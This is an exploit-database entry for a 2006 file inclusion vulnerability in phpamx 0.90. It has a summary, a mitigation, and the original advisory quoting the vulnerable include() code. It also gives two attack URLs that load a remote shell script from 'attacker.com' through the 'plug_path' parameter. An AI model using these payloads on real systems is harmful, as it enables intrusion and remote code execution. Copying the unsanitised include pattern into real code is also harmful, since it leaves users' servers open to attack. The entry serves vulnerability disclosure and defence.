header-logo
Suggest Exploit
vendor:
phpamx
by:
MP
7,5
CVSS
HIGH
Remote|Local File Include Vulnerability
98
CWE
Product Name: phpamx
Affected Version From: 0.90
Affected Version To: 0.90
Patch Exists: NO
Related CWE: N/A
CPE: a:phpamx:phpamx:0.90
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpamx 0.90

phpamx 0.90 is vulnerable to remote and local file inclusion. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'plug_path' parameter in 'php/plugins/main.php' script. An attacker can exploit this vulnerability to include arbitrary remote files and execute arbitrary code on the vulnerable system. The vulnerability requires 'register_globals' to be set to 'On' for the first vulnerability and 'magic_quotes_gpc' to be set to 'Off' for the second vulnerability.

Mitigation:

Disable 'register_globals' and 'magic_quotes_gpc' in php.ini configuration file.
Source

Exploit-DB raw data:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ phpamx 0.90 ]                                     #
#                                                                
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                
# Local:     No       						#
# Type:      High                                               #
# Site:      http://sourceforge.net/projects/phpamx/            #
# Author:    MP
# Contact:   mp01010@yahoo.com     				#
#        							#
#################################################################

Vuln Code
 (php/plugins/main.php):
<?php
include($plug_path."!playtime_top15.php");
include($plug_path."!mapcycle_list.php");
//nothing here
?>

#Vuln 1.0 -> require register_globals = On
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/


#Vuln 2.0 -> require magic_quotes_gpc = Off
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00

# milw0rm.com [2006-10-18]

Navigation

Suggest Exploit

Services By CQR